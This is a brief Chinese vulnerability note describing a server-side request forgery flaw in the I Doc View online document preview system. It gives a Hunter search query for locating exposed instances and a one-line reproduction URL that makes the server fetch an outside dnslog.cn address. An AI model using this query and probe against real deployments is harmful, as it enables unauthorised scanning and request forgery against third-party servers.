I Doc View在线文档预览系统存在服务端请求伪造漏洞
一、漏洞简介
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统,用于在Web环境中展示和预览各种文档类型,如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统存在服务端请求伪造漏洞。
二、影响版本
- I Doc View
三、资产测绘
- hunter
app.name="I Doc View" - 特征
四、漏洞复现
/view/url?url=https://rmcmc0.dnslog.cn